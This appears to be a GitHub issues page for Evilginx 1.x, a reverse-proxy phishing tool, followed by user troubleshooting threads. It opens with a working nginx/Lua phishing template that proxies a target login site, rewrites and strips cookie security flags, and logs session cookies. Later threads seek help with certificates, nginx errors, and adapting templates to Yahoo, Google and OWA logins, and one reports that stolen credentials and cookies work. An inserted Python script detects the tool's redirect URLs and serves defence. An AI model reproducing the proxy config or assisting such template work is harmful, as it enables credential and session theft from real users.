	server_name {{PHISH_HOSTNAME[0]}};

	ssl_certificate {{CERT_PUBLIC_PATH}};
	ssl_certificate_key {{CERT_PRIVATE_PATH}};

	ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
	ssl_prefer_server_ciphers on;
	ssl_ciphers 'EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH';

	if ($scheme = http) {
		return 301 https://$server_name$request_uri;
	}

	location / {
		proxy_pass https://{{TARGET_HOST[0]}};
		proxy_cookie_domain {{COOKIE_HOST[0]}} {{PHISH_DOMAIN}};
		proxy_cookie_domain .www1.{{COOKIE_HOST[0]}} .www1.{{PHISH_DOMAIN}};
		proxy_redirect https://{{TARGET_HOST[0]}}/ https://{{PHISH_HOSTNAME[0]}}/;
		
		sub_filter 'action="https://{{TARGET_HOST[0]}}' 'action="https://{{PHISH_HOSTNAME[0]}}';
		sub_filter 'href="https://{{TARGET_HOST[0]}}' 'href="https://{{PHISH_HOSTNAME[0]}}';
		sub_filter '//{{TARGET_HOST[0]}}' '//{{PHISH_HOSTNAME[0]}}';
		sub_filter_once off;
		
		set $auth_token "tokenid";

		proxy_set_header Accept-Encoding "";
		proxy_set_header X-Real-IP $remote_addr;
		proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

		set_unescape_uri $redir $arg_{{REDIR_ARG}};
		set $set_cookies_all "";

		access_log /var/log/{{LOG_NAME}} site_phish;

		access_by_lua_block {
			if ngx.var.http_origin ~= nil then
				val = string.gsub(ngx.var.http_origin, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
				ngx.req.set_header("Origin", val)
			end

			if ngx.var.http_referer ~= nil then
				val = string.gsub(ngx.var.http_referer, '{{PHISH_HOSTNAME_ESC[0]}}', '{{TARGET_HOST[0]}}')
				ngx.req.set_header("Referer", val)
			end

			if ngx.var.http_cookie ~= nil then
				local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
				local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

				if c_rc ~= nil and c_rd ~= nil then
					ngx.redirect(c_rc)
				end
			end
		}

		header_filter_by_lua_block {
			function get_cookies()
				local cookies = ngx.header.set_cookie or {}
				if type(cookies) == "string" then
					cookies = {cookies}
				end
				return cookies
			end

			function add_cookie(cookie)
				local cookies = get_cookies()
				table.insert(cookies, cookie)
				ngx.header.set_cookie = cookies
			end

			function exists_cookie(cookie)
				local cookies = get_cookies()
				for i, val in ipairs(cookies) do
					if string.match(val, "^" .. cookie .. "=") ~= nil then
						return true
					end
				end
				return false
			end

			ngx.header["Strict-Transport-Security"] = {}
			if ngx.var.http_origin ~= nil then
				ngx.header["Access-Control-Allow-Origin"] = ngx.var.http_origin
			end

			if ngx.var.redir ~= "" then
				local r_url = ngx.var.redir
				if string.sub(r_url,1,1) == '0' then
					val = string.sub(ngx.var.redir, 2)
					r_url = ngx.decode_base64(val)
				end
				add_cookie("{{REDIR_ARG}}=" .. ngx.escape_uri(r_url) .. "; path=/")
			end

			if ngx.header.location then
			end

			if ngx.var.http_cookie ~= nil then
				local c_rc = string.match(ngx.var.http_cookie, "{{REDIR_ARG}}=([^;]*)")
				local c_rd = string.match(ngx.var.http_cookie, "{{SUCCESS_ARG}}=([^;]*)")

				if c_rc ~= nil then
					if exists_cookie(ngx.var.auth_token) or c_rd ~= nil then
						ngx.header.location = ngx.unescape_uri(c_rc)
						add_cookie("{{SUCCESS_ARG}}=true; path=/")
					end
				end
			end
			
			if ngx.header.set_cookie then
				local cookies = ngx.header.set_cookie
				if not cookies then return end
				if type(cookies) ~= "table" then cookies = {cookies} end
				local newcookies = {}
				local allcookies = ""
				for i, val in ipairs(cookies) do
					val = string.gsub(val, '; *[mM]ax%-[aA]ge=[^;]*', "")
					val = string.gsub(val, '; *[eE]xpires=[^;]*', "")
					val = string.gsub(val, '; *[sS]ecure', "")
					table.insert(newcookies, val)
					if i>1 then allcookies = allcookies .. "||" end
					allcookies = allcookies .. val
				end
				ngx.header.set_cookie = newcookies
				ngx.var.set_cookies_all = allcookies
			end
		}
	}
}

Also (this is unrelated): in the .conf files for each site, you have "sub_filter_types text/html application/json;" set unnecessarily; text/html is already set by default. This causes a [warn] duplicate MIME type "text/html" in /etc/nginx/sites-enabled/site.com.conf warning every time the page is requested. Everything still works, but the error.log gets full pretty quickly.
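For defenders, the genurl output earlier on this page and the redirect handling in the site.conf posted above give this obsolete 1.x release a recognisable URL shape: a query value made of "0" followed by the base64 of the post-login redirect. The following detection check over proxy-log URLs is an added example, not code from the project or from the poster; the trusted-suffix list and the sample URLs are assumptions constructed for illustration.

```python
import base64
from urllib.parse import parse_qsl, urlsplit

# Assumption: suffixes your organisation accepts as real login origins.
TRUSTED_SUFFIXES = ("google.com",)
# Login paths taken from the genurl output shown on this page.
LOGIN_PATHS = ("/ServiceLogin", "/signin/v2/identifier")

# Constructed sample of proxy-log URLs (hostnames are the page's placeholders).
SAMPLE_URLS = [
    "https://accounts.yourjjjgoogle.com/ServiceLogin?rc=0aHR0cHM6Ly95b3V0dWJlLmNvbQ",
    "https://accounts.google.com/ServiceLogin?continue=https://mail.google.com",
    "https://shop.example/item?id=0123456",
]


def decode_redirect_token(value):
    """Return the URL carried by a '0' + base64 value, or None."""
    if len(value) < 2 or value[0] != "0":
        return None
    # parse_qsl turns '+' into a space; undo that, then restore stripped padding.
    body = value[1:].replace(" ", "+")
    body += "=" * (-len(body) % 4)
    try:
        decoded = base64.b64decode(body, validate=True).decode("utf-8")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None
    return decoded if decoded.startswith(("http://", "https://")) else None


def host_is_trusted(host):
    """True when host equals, or is a subdomain of, a trusted suffix."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in TRUSTED_SUFFIXES)


def inspect_url(url):
    """Return a finding dict for a suspicious URL, or None."""
    parts = urlsplit(url)
    host = parts.hostname or ""
    if host_is_trusted(host):
        return None
    # The parameter name is configurable (redir_arg), so check every value.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        hidden = decode_redirect_token(value)
        if hidden:
            return {
                "host": host,
                "param": name,
                "redirect": hidden,
                "login_path": parts.path in LOGIN_PATHS,
            }
    return None


def scan(urls):
    """Return the findings for every URL that matches the pattern."""
    return [finding for finding in map(inspect_url, urls) if finding]


if __name__ == "__main__":
    for finding in scan(SAMPLE_URLS):
        print(finding)
```

A hit with `login_path` set to true on an untrusted host is the stronger signal; a hit without it still deserves a look, because the path list only covers the one template shown on this page.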

Created URL not accessible after proper setup

Can't hit the generated URL after successful setup

capture1

Now when I try to open the URL, I get the error site not accessible

Getting following errors for systemctl status nginx.service

capture2

Is there a way to debug this issue?

Failed to start nginx daemon

Installing Evilginx daemon...

Synchronizing state of nginx.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable nginx
Job for nginx.service failed because the control process exited with error code.
See "systemctl status nginx.service" and "journalctl -xe" for details.
[-] Failed to start Nginx daemon.

Then I type
nginx -t -c /etc/nginx/nginx.conf

root@loyal:~/Desktop/evilginx# nginx -t -c /etc/nginx/nginx.conf
nginx: [emerg] dlopen() "/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so" failed (/etc/nginx/nginx/modules/ngx_http_auth_pam_module.so: cannot open shared object file: No such file or directory) in /etc/nginx/modules-enabled/50-mod-http-auth-pam.conf:1
nginx: configuration file /etc/nginx/nginx.conf test failed

Any solution? Thanks anyway.

please make sure that your domain name was entered correctly

Having an issue generating the LetsEncrypt SSL cert. I'm sure my A Record is configured correctly.

./evilginx.py setup --enable facebook -d my_website.com

IMPORTANT NOTES:
 - The following errors were reported by the server:

   Domain: my_website.com
   Type:   unauthorized
   Detail: Invalid response from
   http://my_website.com/.well-known/acme-challenge/IEf-BPDxSuxxxxxxxxxxxxxxxxxxxxx6gWIWrzrU
   [xxx.xxx.xx.xxx]: 404

   To fix these errors, please make sure that your domain name was
   entered correctly and the DNS A/AAAA record(s) for that domain
   contain(s) the right IP address.
 - The following errors were reported by the server:

   Domain: www.my_website.com
   Type:   connection
   Detail: Fetching
   http://www.my_website.com/.well-known/acme-challenge/2dw-LgiFxxxxxxxxxxxxxxxxxxxxIYP-xnCrHw:
   Error getting validation data

   Domain: m.my_website.com
   Type:   connection
   Detail: DNS problem: NXDOMAIN looking up A for m.my_website.com

   To fix these errors, please make sure that your domain name was
   entered correctly and the DNS A/AAAA record(s) for that domain
   contain(s) the right IP address. Additionally, please check that
   your computer has a publicly routable IP address and that no
   firewalls are preventing the server from communicating with the
   client. If you're using the webroot plugin, you should also verify
   that you are serving files from the webroot path you provided.
[-] Failed to obtain certificates.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...

When cloning the evilginx repo, should I clone it to the /var/www/ or /etc/nginx/ directory?

set-cookies header problem

Hi,
I am making a config for Yahoo and have a problem with the set-cookies header. It is:
set-cookie: AS=v=1&s=MGDmtRQc; path=/; domain=.login.yahoo.com; secure; HttpOnly
As you see, it has the secure flag. I think the library can't change the domain, so it passes to the browser with the wrong domain and can't be set in cookie storage (our fake domain is e.g. fakeyahoo.com). Do you have any idea?
Thanks

Google: Not working on Mobile

On my PC it works seamlessly, but on my iPhone it is in a loading loop after entering the username and hitting Next.

Special chars in username

Hello!
It's necessary to filter usernames for special chars - when "/" appears in username (for example in OWA logins) there is a problem to parse. I replaced "/" and "" to "-" in filenames.

Adding preissued certs

Great work on the automation! Could you add some flags to link to certificates we already have? I'd like to be able to spin everything up without using certbot and without modifying the config files manually.

password reset

Hi, did you ever look at the Google password reset? I configured the myaccount subdomain, and the problem is that when it verifies the password for the second time you can't get back to your domain and it will redirect to their website.
In other words, can we see myaccount.google.com as myaccount.fake.com, with it showing our username so that we see that we are logged in?
After authorization, I want to see the myaccount page that says I am logged in (on the fake domain).
Regards

Improper Domain Variable Interpretation - Causes 500 Server Error upon redirect/can't handle #'s in domain name

Hello - If I get around to it this will be a Pull request and not an issue.

When you check for special characters in the domain name, you use:
    for c in phish_host:
        if not c.isalpha():
            phish_hostname_esc += '%'
        phish_hostname_esc += c
    phish_hostnames_esc.append(phish_hostname_esc)

You must change the "isalpha()" to "isalnum()" to include numbers, otherwise the domain name will have escape characters inserted in front of every number.

[emerg] directive "server_name" is not terminated by ";"

Hey @kgretzky, I would like to feature Evilginx on Null Byte, and I could use your help resolving this issue. I'm getting a '"server_name" is not terminated by ";"' error even though there are semicolons at the ends of each directive. No errors when using the install.sh script.

VPS specs:

$ lsb_release -a

Distributor ID:	Debian
Description:	Debian GNU/Linux 9.3 (stretch)
Release:	9.3
Codename:	stretch

$ uname -a
Linux hostname 4.9.0-5-amd64 #1 SMP Debian 4.9.65-3+deb9u2 (2018-01-04) x86_64 GNU/Linux

Using the following evilginx command:

$ ./evilginx.py setup --enable facebook -d mywebsite.com
            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/       v.1.1.0

[*] Using domain: mywebsite.com
[*] Stopping nginx daemon...
[+] Site 'facebook' enabled.
[?] Do you want to automatically parse all logs every minute? [y/N] n
[?] Do you want to install LetsEncrypt SSL/TLS certificates now? [Y/n] y
[*] Getting SSL/TLS certificates for following domains:
 - mywebsite.com
 - www.mywebsite.com
 - m.mywebsite.com
Saving debug log to /var/log/letsencrypt/letsencrypt.log
Plugins selected: Authenticator standalone, Installer None
Cert not yet due for renewal

You have an existing certificate that has exactly the same domains or certificate name you requested and isn't close to expiry.
(ref: /etc/letsencrypt/renewal/mywebsite.com.conf)

What would you like to do?
-------------------------------------------------------------------------------
1: Keep the existing certificate for now
2: Renew & replace the cert (limit ~5 per 7 days)
-------------------------------------------------------------------------------
Select the appropriate number [1-2] then [enter] (press 'c' to cancel): 1
Keeping the existing certificate

-------------------------------------------------------------------------------
Certificate not yet due for renewal; no action taken.
-------------------------------------------------------------------------------
[+] Certificates obtained successfully.
[?] Do you want to auto-renew all obtained SSL/TLS certificates? [Y/n] n
[*] Starting nginx daemon...

There are no other server blocks in my nginx.conf:

http {
    include /root/evilginx/sites/facebook/*.conf;
    ....

Errors when starting nginx:

-- Unit nginx.service has begun starting up.
----  hostname nginx[6879]: nginx: [emerg] directive "server_name" is not terminated by ";" in /root/evilginx/sites/facebook/m.facebook.com.conf:7
----  hostname nginx[6879]: nginx: configuration file /etc/nginx/nginx.conf test failed
----  hostname systemd[1]: nginx.service: Control process exited, code=exited status=1
----  hostname systemd[1]: Failed to start The NGINX HTTP and reverse proxy server.
-- Subject: Unit nginx.service has failed

The evilginx/sites/m.facebook.com.conf:

server {
	listen 80;
	listen 443 ssl;

	server_name {{PHISH_HOSTNAME[1]}}; # line 7, server_name terminated by ;

	ssl_certificate {{CERT_PUBLIC_PATH}};
	ssl_certificate_key {{CERT_PRIVATE_PATH}};
	....

If I manually replace "{{PHISH_HOSTNAME[1]}}" with "mywebsite.com", I'll instead receive a "not terminated by ;" error for the following ssl_certificate* directives. If I delete the mobile conf and try the www conf only, Nginx complains the "{{PHISH_HOSTNAME[0]}}" line wasn't terminated properly. Any idea why this might be happening?

Google template - Victim is not being authenticated

Hello @kgretzky, first of all I want to thank you; this tool is really awesome and very useful for pentest engagements.
I was testing the google template, and the cookies and credentials are stolen and work like a charm. However, I noticed that the victim is not being logged in after entering the credentials. I mean, the victim is being redirected to the myaccounts page but is not authenticated.

I tried to troubleshoot and all the cookies seem to be OK. However, the last request after authentication is performed (after sending credentials and before being redirected to myaccount.google.com) is not sending the corresponding cookies. I'm suspecting that maybe that's the reason why the victim is not being authenticated.

Is it possible that Google has changed something and that's why it is not working? Could you give me a hand with this?

Thanks man, I would really appreciate your help.

Sites

Hello and thanks for this work.
Sorry for my English.
How do I add a new website in the folder?
What are the important elements to put in to create kinds of templates?

Thanks.

Masto.
